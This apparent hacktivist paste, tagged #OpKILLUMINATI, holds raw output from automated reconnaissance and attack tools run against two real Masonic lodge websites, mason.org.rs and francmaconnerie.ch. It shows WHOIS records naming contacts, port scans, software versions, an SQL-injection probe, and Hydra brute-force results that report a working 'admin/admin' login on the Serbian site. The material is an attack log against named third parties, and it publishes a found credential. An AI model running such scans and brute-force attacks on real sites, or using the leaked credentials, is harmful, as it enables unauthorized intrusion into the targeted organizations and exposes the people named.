Anonymous V.S BlackHats JTSEC full Target #OpKILLUMINATI #5

a guest
Jan 8th, 2018
  1. ######################################################################################################################################
  2. Hostname www.mason.org.rs ISP Loopia AB (AS39570)
  3. Continent Europe Flag
  4. SE
  5. Country Sweden Country Code SE (SWE)
  6. Region Unknown Local time 07 Jan 2018 16:30 CET
  7. City Unknown Latitude 59.325
  8. IP Address 194.9.94.152 Longitude 18.056
  9. ######################################################################################################################################
  10. [i] Scanning Site: http://mason.org.rs
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title:
  19. [+] IP address: 194.9.94.152
  20. [+] Web Server: Could Not Detect
  21. [+] CMS: Joomla
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Found
  24.  
  25. -------------[ contents ]----------------
  26. # If the Joomla site is installed within a folder
  27. # eg www.example.com/joomla/ then the robots.txt file
  28. # MUST be moved to the site root
  29. # eg www.example.com/robots.txt
  30. # AND the joomla folder name MUST be prefixed to all of the
  31. # paths.
  32. # eg the Disallow rule for the /administrator/ folder MUST
  33. # be changed to read
  34. # Disallow: /joomla/administrator/
  35. #
  36. # For more information about the robots.txt standard, see:
  37. # http://www.robotstxt.org/orig.html
  38. #
  39. # For syntax checking, see:
  40. # http://tool.motoricerca.info/robots-checker.phtml
  41.  
  42. User-agent: *
  43. Disallow: /administrator/
  44. Disallow: /bin/
  45. Disallow: /cache/
  46. Disallow: /cli/
  47. Disallow: /components/
  48. Disallow: /includes/
  49. Disallow: /installation/
  50. Disallow: /language/
  51. Disallow: /layouts/
  52. Disallow: /libraries/
  53. Disallow: /logs/
  54. Disallow: /modules/
  55. Disallow: /plugins/
  56. Disallow: /tmp/
  57.  
  58.  
  59. -----------[end of contents]-------------
  60.  
  61.  
  62.  
  63. W H O I S L O O K U P
  64. ========================
  65.  
  66. %
  67. %This is the RNIDS Whois server.
  68. %
  69. % Date Format : DD.MM.YYYY
  70. % Whois Server Version: 1.0.0
  71. %
  72. % Rights restricted by copyright.
  73. % See http://www.rnids.rs/whois_en
  74. %
  75. %
  76. %
  77. % Ovo je odgovor od RNIDS Whois servera.
  78. %
  79. % Format datuma : DD.MM.YYYY
  80. % Verzija Whois Servera : 1.0.0
  81. %
  82. % Sva prava zadržana. Za više informacija.
  83. % pogledajte http://www.rnids.rs/whois_sr
  84.  
  85. Domain name: mason.org.rs
  86. Domain status: Active
  87. Registration date: 20.05.2009 09:25:05
  88. Modification date: 20.04.2017 15:43:53
  89. Expiration date: 20.05.2018 09:25:05
  90. Registrar: Loopia d.o.o.
  91.  
  92.  
  93. Registrant: Velika Nacionalna Loza Srbije
  94. Address: Sajmiste Bb, Beograd, Serbia
  95. ID Number: 17704974
  96. Tax ID: 105454946
  97.  
  98.  
  99. DNS: ns1.loopia.se - 93.188.0.20
  100. DNS: ns2.loopia.se - 93.188.0.21
  101. DNS: ns3.loopia.se - 194.9.94.245
  102. DNS: ns4.loopia.se - 194.9.95.245
  103.  
  104.  
  105. Administrative contact: Voja Milicevic, Velika Nacionalna Loza Srbije
  106. Address: Sajmiste Bb, Beograd, Serbia
  107.  
  108. Technical contact: Dijana Todorović, Loopia d.o.o.
  109. Address: Obrenovićeva 46, TPC KALČA C1/72, Nis, Serbia
  110.  
  111.  
  112.  
  113.  
  114. G E O I P L O O K U P
  115. =========================
  116.  
  117. [i] IP Address: 194.9.94.152
  118. [i] Country: SE
  119. [i] State: N/A
  120. [i] City: N/A
  121. [i] Latitude: 59.324699
  122. [i] Longitude: 18.056000
  123.  
  124.  
  125.  
  126.  
  127. H T T P H E A D E R S
  128. =======================
  129.  
  130.  
  131. [i] HTTP/1.1 200 OK
  132. [i] Server: nginx/1.12.1
  133. [i] Date: Sun, 07 Jan 2018 15:48:06 GMT
  134. [i] Content-Type: text/html; charset=utf-8
  135. [i] Connection: close
  136. [i] Vary: X-Forwarded-For
  137. [i] X-Powered-By: PHP/5.6.30
  138. [i] Set-Cookie: 649c1dfc682d5288fa34186a03dbd086=sf5r79gel8kf1lal33gf0cbai1; path=/; HttpOnly
  139. [i] Expires: Wed, 17 Aug 2005 00:00:00 GMT
  140. [i] Last-Modified: Sun, 07 Jan 2018 15:48:06 GMT
  141. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  142. [i] Pragma: no-cache
  143.  
  144.  
  145.  
  146.  
  147. D N S L O O K U P
  148. ===================
  149.  
  150. mason.org.rs. 299 IN A 194.9.94.152
  152. mason.org.rs. 3599 IN NS ns1.loopia.se.
  153. mason.org.rs. 3599 IN NS ns2.loopia.se.
  155. mason.org.rs. 3599 IN SOA ns1.loopia.se. registry.loopia.se. 1515024000 10800 3600 604800 86400
  157. mason.org.rs. 299 IN MX 10 mail.mason.org.rs.
  158. mason.org.rs. 299 IN MX 20 mail2.mason.org.rs.
  164. mason.org.rs. 21599 IN NSEC3PARAM 1 0 1 AB
  166.  
  167.  
  168.  
  169.  
  170. S U B N E T C A L C U L A T I O N
  171. ====================================
  172.  
  173. Address = 194.9.94.152
  174. Network = 194.9.94.152 / 32
  175. Netmask = 255.255.255.255
  176. Broadcast = not needed on Point-to-Point links
  177. Wildcard Mask = 0.0.0.0
  178. Hosts Bits = 0
  179. Max. Hosts = 1 (2^0 - 0)
  180. Host Range = { 194.9.94.152 - 194.9.94.152 }
  181.  
  182.  
  183.  
  184. N M A P P O R T S C A N
  185. ============================
  186.  
  187.  
  188. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 15:48 UTC
  189. Nmap scan report for mason.org.rs (194.9.94.152)
  190. Host is up (0.11s latency).
  191. rDNS record for 194.9.94.152: s436.loopia.se
  192. PORT STATE SERVICE VERSION
  193. 21/tcp filtered ftp
  194. 22/tcp filtered ssh
  195. 23/tcp filtered telnet
  196. 25/tcp filtered smtp
  197. 80/tcp open http nginx 1.12.1
  198. 110/tcp filtered pop3
  199. 143/tcp filtered imap
  200. 443/tcp open ssl/http nginx 1.12.1
  201. 445/tcp filtered microsoft-ds
  202. 3389/tcp filtered ms-wbt-server
  203.  
  204. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  205. Nmap done: 1 IP address (1 host up) scanned in 15.38 seconds
  206. Enter the target: http://www.mason.org.rs/
  207. [!] IP Address : 194.9.94.152
  208. [!] Server: nginx/1.12.1
  209. [!] Powered By: PHP/5.6.30
  210. [-] Clickjacking protection is not in place.
  211. [!] www.mason.org.rs doesn't seem to use a CMS
  212. [+] Honeypot Probabilty: 0%
  213. ----------------------------------------
  214. PORT STATE SERVICE VERSION
  215. 21/tcp filtered ftp
  216. 22/tcp filtered ssh
  217. 23/tcp filtered telnet
  218. 25/tcp filtered smtp
  219. 80/tcp open http nginx 1.12.1
  220. 110/tcp filtered pop3
  221. 143/tcp filtered imap
  222. 443/tcp open ssl/http nginx 1.12.1
  223. 445/tcp filtered microsoft-ds
  224. 3389/tcp filtered ms-wbt-server
  225. ----------------------------------------
  226.  
  227. [+] DNS Records
  228.  
  229. [+] Host Records (A)
  230. www.mason.org.rsHTTP: (s436.loopia.se) (194.9.94.152) AS39570 Loopia AB Sweden
  231.  
  232. [+] TXT Records
  233.  
  234. [+] DNS Map: https://dnsdumpster.com/static/map/mason.org.rs.png
  235.  
  236. [>] Initiating 3 intel modules
  237. [>] Loading Alpha module (1/3)
  238. [>] Beta module deployed (2/3)
  239. [>] Gamma module initiated (3/3)
  240.  
  241.  
  242. [+] Emails found:
  243. ------------------
  244. pixel-151534009481492-web-@www.mason.org.rs
  245. pixel-1515340100556472-web-@www.mason.org.rs
  246. No hosts found
  247. [+] Virtual hosts:
  248. -----------------
  249. [>] Crawling the target for fuzzable URLs
  250. [+] Found 11 fuzzable URLs
  251. http://www.mason.org.rs///index.php?limit=10&start=10
  252. [>] Using SQLMap api to check for SQL injection vulnerabilities. Don't
  253. worry we are using an online service and it doesn't depend on your internet connection.
  254. This scan will take 2-3 minutes.
  255. ====================================================================================
  256.  RUNNING NSLOOKUP 
  257. ====================================================================================
  258. Server: 192.168.1.254
  259. Address: 192.168.1.254#53
  260.  
  261. Non-authoritative answer:
  262. Name: mason.org.rs
  263. Address: 194.9.94.152
  264.  
  265. mason.org.rs has address 194.9.94.152
  266. mason.org.rs mail is handled by 20 mail2.mason.org.rs.
  267. mason.org.rs mail is handled by 10 mail.mason.org.rs.
  268. ====================================================================================
  269.  CHECKING OS FINGERPRINT 
  270. ====================================================================================
  271.  
  272. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  273.  
  274. [+] Target is mason.org.rs
  275. [+] Loading modules.
  276. [+] Following modules are loaded:
  277. [x] [1] ping:icmp_ping - ICMP echo discovery module
  278. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  279. [x] [3] ping:udp_ping - UDP-based ping discovery module
  280. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  281. [x] [5] infogather:portscan - TCP and UDP PortScanner
  282. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  283. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  284. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  285. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  286. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  287. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  288. [x] [12] fingerprint:smb - SMB fingerprinting module
  289. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  290. [+] 13 modules registered
  291. [+] Initializing scan engine
  292. [+] Running scan engine
  293. [-] ping:tcp_ping module: no closed/open TCP ports known on 194.9.94.152. Module test failed
  294. [-] ping:udp_ping module: no closed/open UDP ports known on 194.9.94.152. Module test failed
  295. [-] No distance calculation. 194.9.94.152 appears to be dead or no ports known
  296. [+] Host: 194.9.94.152 is up (Guess probability: 50%)
  297. [+] Target: 194.9.94.152 is alive. Round-Trip Time: 9.71941 sec
  298. [+] Selected safe Round-Trip Time value is: 19.43883 sec
  299. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  300. [-] fingerprint:smb need either TCP port 139 or 445 to run
  301. [+] Primary guess:
  302. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.8" (Guess probability: 91%)
  303. [+] Other guesses:
  304. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.4" (Guess probability: 91%)
  305. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.2" (Guess probability: 91%)
  306. [+] Host 194.9.94.152 Running OS: (Guess probability: 91%)
  307. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
  308. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
  309. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
  310. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.7" (Guess probability: 91%)
  311. [+] Host 194.9.94.152 Running OS: "FreeBSD 4.6" (Guess probability: 91%)
  312. [+] Host 194.9.94.152 Running OS: "FreeBSD 5.3" (Guess probability: 91%)
  313. [+] Cleaning up scan engine
  314. [+] Modules deinitialized
  315. [+] Execution completed.
  316. ====================================================================================
  317.  GATHERING WHOIS INFO 
  318. ====================================================================================
  363. ====================================================================================
  364.  GATHERING OSINT INFO 
  365. ====================================================================================
  366.  
  367. *******************************************************************
  368. * *
  369. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  370. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  371. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  372. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  373. * *
  374. * TheHarvester Ver. 2.7 *
  375. * Coded by Christian Martorella *
  376. * Edge-Security Research *
  377. * cmartorella@edge-security.com *
  378. *******************************************************************
  379.  
  380.  
  381. Full harvest..
  382. [-] Searching in Google..
  383. Searching 0 results...
  384. [-] Searching in PGP Key server..
  385. [-] Searching in Bing..
  386.  
  387. ******************************************************
  388. * /\/\ ___| |_ __ _ __ _ ___ ___ / _(_) | *
  389. * / \ / _ \ __/ _` |/ _` |/ _ \ / _ \| |_| | | *
  390. * / /\/\ \ __/ || (_| | (_| | (_) | (_) | _| | | *
  391. * \/ \/\___|\__\__,_|\__, |\___/ \___/|_| |_|_| *
  392. * |___/ *
  393. * Metagoofil Ver 2.2 *
  394. * Christian Martorella *
  395. * Edge-Security.com *
  396. * cmartorella_at_edge-security.com *
  397. ******************************************************
  398.  
  399. [-] Starting online search...
  400.  
  401. [-] Searching for doc files, with a limit of 25
  402. Searching 100 results...
  403. Results: 0 files found
  404. Starting to download 25 of them:
  405. ----------------------------------------
  406.  
  407.  
  408. [-] Searching for pdf files, with a limit of 25
  409. Searching 100 results...
  410. Results: 0 files found
  411. Starting to download 25 of them:
  412. ----------------------------------------
  413.  
  414.  
  415. [-] Searching for xls files, with a limit of 25
  416. Searching 100 results...
  417. Results: 0 files found
  418. Starting to download 25 of them:
  419. ----------------------------------------
  420.  
  421.  
  422. [-] Searching for csv files, with a limit of 25
  423. Searching 100 results...
  424. Results: 0 files found
  425. Starting to download 25 of them:
  426. ----------------------------------------
  427.  
  428.  
  429. [-] Searching for txt files, with a limit of 25
  430. Searching 100 results...
  431. Results: 0 files found
  432. Starting to download 25 of them:
  433. ----------------------------------------
  434.  
  435. processing
  436. user
  437. email
  438.  
  439. [+] List of users found:
  440. --------------------------
  441.  
  442. [+] List of software found:
  443. -----------------------------
  444.  
  445. [+] List of paths and servers found:
  446. ---------------------------------------
  447.  
  448. [+] List of e-mails found:
  449. ----------------------------
  450. ====================================================================================
  451.  GATHERING DNS INFO 
  452. ====================================================================================
  453.  
  454. ; <<>> DiG 9.11.2-5-Debian <<>> -x mason.org.rs
  455. ;; global options: +cmd
  456. ;; Got answer:
  457. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3001
  458. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  459.  
  460. ;; OPT PSEUDOSECTION:
  461. ; EDNS: version: 0, flags:; udp: 4096
  462. ;; QUESTION SECTION:
  463. ;rs.org.mason.in-addr.arpa. IN PTR
  464.  
  465. ;; AUTHORITY SECTION:
  466. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102539 1800 900 604800 3600
  467.  
  468. ;; Query time: 203 msec
  469. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  470. ;; WHEN: Sun Jan 07 10:43:16 EST 2018
  471. ;; MSG SIZE rcvd: 122
  472.  
  473. dnsenum VERSION:1.2.4
  474. 
  475. ----- mason.org.rs -----
  476. 
  477.  
  478. Host's addresses:
  479. __________________
  480.  
  481. mason.org.rs. 94 IN A 194.9.94.152
  482. 
  483.  
  484. Name Servers:
  485. ______________
  486.  
  487. ns1.loopia.se. 3598 IN A 93.188.0.20
  488. ns2.loopia.se. 3600 IN A 93.188.0.21
  489. 
  490.  
  491. Mail (MX) Servers:
  492. ___________________
  493.  
  494. mail.mason.org.rs. 93 IN A 194.9.94.72
  495. mail2.mason.org.rs. 93 IN A 194.9.94.3
  496. 
  497.  
  498. Trying Zone Transfers and getting Bind Versions:
  499. _________________________________________________
  500.  
  501. 
  502. Trying Zone Transfer for mason.org.rs on ns1.loopia.se ...
  503.  
  504. Trying Zone Transfer for mason.org.rs on ns2.loopia.se ...
  505.  
  506. brute force file not specified, bay.
  507. ====================================================================================
  508.  GATHERING DNS SUBDOMAINS 
  509. ====================================================================================
  510. 
  511. ____ _ _ _ _ _____
  512. / ___| _ _| |__ | (_)___| |_|___ / _ __
  513. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  514. ___) | |_| | |_) | | \__ \ |_ ___) | |
  515. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  516.  
  517. # Coded By Ahmed Aboul-Ela - @aboul3la
  518.  
  519. [-] Enumerating subdomains now for mason.org.rs
  520. [-] verbosity is enabled, will show the subdomains results in realtime
  521. [-] Searching now in Baidu..
  522. [-] Searching now in Yahoo..
  523. [-] Searching now in Google..
  524. [-] Searching now in Bing..
  525. [-] Searching now in Ask..
  526. [-] Searching now in Netcraft..
  527. [-] Searching now in DNSdumpster..
  528. [-] Searching now in Virustotal..
  529. [-] Searching now in ThreatCrowd..
  530. [-] Searching now in SSL Certificates..
  531. [-] Searching now in PassiveDNS..
  532. Yahoo: www.mason.org.rs
  533. ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
  534. ("bad handshake: SysCallError(-1, 'Unexpected EOF')",)
  535. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-mason.org.rs.txt
  536. [-] Total Unique Subdomains Found: 1
  537. www.mason.org.rs
  538.  
  539.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  540.  ║ ╠╦╝ ║ ╚═╗╠═╣
  541.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  542. ====================================================================================
  543.  GATHERING CERTIFICATE SUBDOMAINS 
  544. ====================================================================================
  545. 
  546.  
  547. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-mason.org.rs-full.txt
  548. 
  549. ====================================================================================
  550.  CHECKING FOR SUBDOMAIN HIJACKING 
  551. ====================================================================================
  552. ====================================================================================
  553.  CHECKING EMAIL SECURITY 
  554. ====================================================================================
  555.  
  556. ====================================================================================
  557.  STARTING DOMAIN FLYOVER 
  558. ====================================================================================
  559. ====================================================================================
  560.  STARTING PUBLIC S3 BUCKET SCAN 
  561. ====================================================================================
  562.  
  563.  
  564. ====================================================================================
  565.  PINGING HOST 
  566. ====================================================================================
  567. PING mason.org.rs (194.9.94.152) 56(84) bytes of data.
  568. 64 bytes from s436.loopia.se (194.9.94.152): icmp_seq=1 ttl=49 time=2821 ms
  569.  
  570. --- mason.org.rs ping statistics ---
  571. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  572. rtt min/avg/max/mdev = 2821.181/2821.181/2821.181/0.000 ms
  573.  
  574. ====================================================================================
  575.  RUNNING TCP PORT SCAN 
  576. ====================================================================================
  577.  
  578. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
  579. Nmap done: 1 IP address (1 host up) scanned in 25.59 seconds
  580.  
  581. ====================================================================================
  582.  RUNNING INTRUSIVE SCANS 
  583. ====================================================================================
  584.  
  585. ====================================================================================
  586.  SCANNING FOR COMMON VULNERABILITIES 
  587. ====================================================================================
  588. ====================================================================================
  589.  SKIPPING FULL NMAP PORT SCAN 
  590. ====================================================================================
  591. ====================================================================================
  592.  RUNNING BRUTE FORCE 
  593. ====================================================================================
  594.  __________ __ ____ ___
  595.  \______ \_______ __ ___/ |_ ____ \ \/ /
  596.  | | _/\_ __ \ | \ __\/ __ \ \ / 
  597.  | | \ | | \/ | /| | \ ___/ / \ 
  598.  |______ / |__| |____/ |__| \___ >___/\ \ 
  599.  \/ \/ \_/
  600.  
  601.  + -- --=[BruteX v1.7 by 1N3
  602.  + -- --=[http://crowdshield.com
  603.  
  604.  
  605. ################################### Running Port Scan ##############################
  606.  
  607. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 10:48 EST
  608. Nmap scan report for mason.org.rs (194.9.94.152)
  609. Host is up (0.14s latency).
  610. rDNS record for 194.9.94.152: s436.loopia.se
  611. Not shown: 24 filtered ports
  612. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  613. PORT STATE SERVICE
  614. 80/tcp open http
  615. 443/tcp open https
  616.  
  617. Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds
  618.  
  619. ################################### Running Brute Force ############################
  620.  
  621.  + -- --=[Port 21 closed... skipping.
  622.  + -- --=[Port 22 closed... skipping.
  623.  + -- --=[Port 23 closed... skipping.
  624.  + -- --=[Port 25 closed... skipping.
  625.  + -- --=[Port 80 opened... running tests...
  626. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  627.  
  628. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:39
  629. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  630. [DATA] attacking http-get://mason.org.rs:80//
  631. [80][http-get] host: mason.org.rs login: admin password: admin
  632. [STATUS] attack finished for mason.org.rs (valid pair found)
  633. 1 of 1 target successfully completed, 1 valid password found
  634. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:43
  635.  + -- --=[Port 110 closed... skipping.
  636.  + -- --=[Port 139 closed... skipping.
  637.  + -- --=[Port 162 closed... skipping.
  638.  + -- --=[Port 389 closed... skipping.
  639.  + -- --=[Port 443 opened... running tests...
  640. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  641.  
  642. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-07 10:48:44
  643. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  644. [DATA] attacking http-gets://mason.org.rs:443//
  645. [443][http-get] host: mason.org.rs login: admin password: admin
  646. [STATUS] attack finished for mason.org.rs (valid pair found)
  647. 1 of 1 target successfully completed, 1 valid password found
  648. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-07 10:48:50
  649.  
  650.  
  651. ################################### Done! ###########################################
  652.  
  653. ====================================================================================
  654.  SCAN COMPLETE! 
  655. ====================================================================================
  656.  
  657. ######################################################################################################################################
  658. Hostname www.francmaconnerie.ch ISP Infomaniak Network SA (AS29222)
  659. Continent Europe Flag
  660. CH
  661. Country Switzerland Country Code CH (CHE)
  662. Region Unknown Local time 07 Jan 2018 17:10 CET
  663. City Unknown Latitude 47.145
  664. IP Address 93.88.240.208 Longitude 8.155
  665. ######################################################################################################################################
  666. [i] Scanning Site: http://francmaconnerie.ch
  667.  
  668.  
  669.  
  670. B A S I C I N F O
  671. ====================
  672.  
  673.  
  674. [+] Site Title:
  675. [+] IP address: 93.88.240.208
  676. [+] Web Server: Apache
  677. [+] CMS: Drupal
  678. [+] Cloudflare: Not Detected
  679. [+] Robots File: Found
  680.  
  681. -------------[ contents ]----------------
  682. #
  683. # robots.txt
  684. #
  685. # This file is to prevent the crawling and indexing of certain parts
  686. # of your site by web crawlers and spiders run by sites like Yahoo!
  687. # and Google. By telling these "robots" where not to go on your site,
  688. # you save bandwidth and server resources.
  689. #
  690. # This file will be ignored unless it is at the root of your host:
  691. # Used: http://example.com/robots.txt
  692. # Ignored: http://example.com/site/robots.txt
  693. #
  694. # For more information about the robots.txt standard, see:
  695. # http://www.robotstxt.org/robotstxt.html
  696.  
  697. User-agent: *
  698. Crawl-delay: 10
  699. # Directories
  700. Disallow: /includes/
  701. Disallow: /misc/
  702. Disallow: /modules/
  703. Disallow: /profiles/
  704. Disallow: /scripts/
  705. Disallow: /themes/
  706. # Files
  707. Disallow: /CHANGELOG.txt
  708. Disallow: /cron.php
  709. Disallow: /INSTALL.mysql.txt
  710. Disallow: /INSTALL.pgsql.txt
  711. Disallow: /INSTALL.sqlite.txt
  712. Disallow: /install.php
  713. Disallow: /INSTALL.txt
  714. Disallow: /LICENSE.txt
  715. Disallow: /MAINTAINERS.txt
  716. Disallow: /update.php
  717. Disallow: /UPGRADE.txt
  718. Disallow: /xmlrpc.php
  719. # Paths (clean URLs)
  720. Disallow: /admin/
  721. Disallow: /comment/reply/
  722. Disallow: /filter/tips/
  723. Disallow: /node/add/
  724. Disallow: /search/
  725. Disallow: /user/register/
  726. Disallow: /user/password/
  727. Disallow: /user/login/
  728. Disallow: /user/logout/
  729. # Paths (no clean URLs)
  730. Disallow: /?q=admin/
  731. Disallow: /?q=comment/reply/
  732. Disallow: /?q=filter/tips/
  733. Disallow: /?q=node/add/
  734. Disallow: /?q=search/
  735. Disallow: /?q=user/password/
  736. Disallow: /?q=user/register/
  737. Disallow: /?q=user/login/
  738. Disallow: /?q=user/logout/
  739.  
  740. -----------[end of contents]-------------
  741.  
  742.  
  743.  
  744. W H O I S L O O K U P
  745. ========================
  746.  
  747. The number of requests per client per time interval is
  748. restricted. You have exceeded this limit.
  749. Please wait a moment and try again.
  750.  
  751.  
  752.  
  753.  
  754.  
  755. G E O I P L O O K U P
  756. =========================
  757.  
  758. [i] IP Address: 93.88.240.208
  759. [i] Country: CH
  760. [i] State: N/A
  761. [i] City: N/A
  762. [i] Latitude: 47.144901
  763. [i] Longitude: 8.155100
  764.  
  765.  
  766.  
  767.  
  768. H T T P H E A D E R S
  769. ======================
  770. [i] HTTP/1.1 403 Forbidden
  771. [i] Date: Sun, 07 Jan 2018 16:22:15 GMT
  772. [i] Server: Apache
  773. [i] Vary: accept-language,accept-charset
  774. [i] Accept-Ranges: bytes
  775. [i] Connection: close
  776. [i] Content-Type: text/html; charset=iso-8859-1
  777. [i] Content-Language: en
  778. [i] Expires: Sun, 07 Jan 2018 16:22:15 GMT
  779.  
  780.  
  781.  
  782.  
  783. D N S L O O K U P
  784. ===================
  785.  
  786. francmaconnerie.ch. 21599 IN SOA ns5.infomaniak.ch. hostmaster.infomaniak.ch. 2013081201 10800 3600 604800 86400
  787. francmaconnerie.ch. 21599 IN TXT "v=spf1 include:spf.infomaniak.ch ?all"
  788. francmaconnerie.ch. 21599 IN MX 5 mta-gw.infomaniak.ch.
  789. francmaconnerie.ch. 21599 IN A 93.88.240.208
  790. francmaconnerie.ch. 21599 IN NS ns6.infomaniak.ch.
  791. francmaconnerie.ch. 21599 IN NS ns5.infomaniak.ch.
  792.  
  793.  
  794.  
  795.  
  796. S U B N E T C A L C U L A T I O N
  797. ====================================
  798.  
  799. Address = 93.88.240.208
  800. Network = 93.88.240.208 / 32
  801. Netmask = 255.255.255.255
  802. Broadcast = not needed on Point-to-Point links
  803. Wildcard Mask = 0.0.0.0
  804. Hosts Bits = 0
  805. Max. Hosts = 1 (2^0 - 0)
  806. Host Range = { 93.88.240.208 - 93.88.240.208 }
  807.  
  808.  
  809.  
  810. N M A P P O R T S C A N
  811. ============================
  812.  
  813.  
  814. Starting Nmap 7.01 ( https://nmap.org ) at 2018-01-07 16:23 UTC
  815. Nmap scan report for francmaconnerie.ch (93.88.240.208)
  816. Host is up (0.099s latency).
  817. rDNS record for 93.88.240.208: imu215.infomaniak.ch
  818. PORT STATE SERVICE VERSION
  819. 21/tcp open ftp ProFTPD 1.3.4e
  820. 22/tcp filtered ssh
  821. 23/tcp filtered telnet
  822. 25/tcp filtered smtp
  823. 80/tcp open http Apache httpd
  824. 110/tcp filtered pop3
  825. 143/tcp filtered imap
  826. 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
  827. 445/tcp filtered microsoft-ds
  828. 3389/tcp filtered ms-wbt-server
  829. Service Info: OS: Unix
  830.  
  831. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  832. Nmap done: 1 IP address (1 host up) scanned in 15.22 seconds
  833. [!] IP Address : 93.88.240.208
  834. [!] Server: Apache
  835. [-] Clickjacking protection is not in place.
  836. [!] www.francmaconnerie.ch doesn't seem to use a CMS
  837. [+] Honeypot Probabilty: 0%
  838. ----------------------------------------
  839. PORT STATE SERVICE VERSION
  840. 21/tcp open ftp ProFTPD 1.3.4e
  841. 22/tcp filtered ssh
  842. 23/tcp filtered telnet
  843. 25/tcp filtered smtp
  844. 80/tcp open http Apache httpd
  845. 110/tcp filtered pop3
  846. 143/tcp filtered imap
  847. 443/tcp open ssl/http Apache httpd
  848. 445/tcp filtered microsoft-ds
  849. 3389/tcp filtered ms-wbt-server
  850. ----------------------------------------
  851.  
  852. [+] DNS Records
  853. ns5.infomaniak.ch. (84.16.66.68) AS29222 Infomaniak Network SA Switzerland
  854. ns6.infomaniak.ch. (84.16.67.68) AS29222 Infomaniak Network SA Switzerland
  855.  
  856. [+] MX Records
  857. 5 (83.166.132.48) AS29222 Infomaniak Network SA Switzerland
  858.  
  859. [+] Host Records (A)
  860. www.francmaconnerie.chHTTP: (imu215.infomaniak.ch) (93.88.240.208) AS29222 Infomaniak Network SA Switzerland
  861.  
  862. [+] TXT Records
  863. "v=spf1 include:spf.infomaniak.ch ?all"
  864.  
  865. [+] DNS Map: https://dnsdumpster.com/static/map/francmaconnerie.ch.png
  866.  
  867. [>] Initiating 3 intel modules
  868. [>] Loading Alpha module (1/3)
  869. [>] Beta module deployed (2/3)
  870.  
  871. Target: http://francmaconnerie.ch
  872.  
  873. Server: Apache
  874.  
  875.  
  876. ## Checking if the target has deployed an Anti-Scanner measure
  877.  
  878. [!] Scanning Passed ..... OK
  879.  
  880.  
  881. ## Detecting Joomla! based Firewall ...
  882.  
  883. [!] A Joomla! RS-Firewall (com_rsfirewall/com_firewall) is detected.
  884. [!] The vulnerability probing may be logged and protected.
  885.  
  886. [!] A Joomla! J-Firewall (com_jfw) is detected.
  887. [!] The vulnerability probing may be logged and protected.
  888.  
  889. [!] A SecureLive Joomla!(mod_securelive/com_securelive) firewall is detected.
  890. [!] The vulnerability probing may be logged and protected.
  891.  
  892. [!] A SecureLive Joomla! firewall is detected.
  893. [!] The vulnerability probing may be logged and protected.
  894.  
  895. [!] A Joomla! security scanner (com_joomscan/com_joomlascan) is detected.
  896. [!] It is likely that webmaster routinely checks insecurities.
  897.  
  898. [!] A security scanner (com_securityscanner/com_securityscan) is detected.
  899.  
  900. [!] A Joomla! GuardXT Security Component is detected.
  901. [!] It is likely that webmaster routinely checks for insecurities.
  902.  
  903. [!] A Joomla! JoomSuite Defender is detected.
  904. [!] The vulnerability probing may be logged and protected.
  905.  
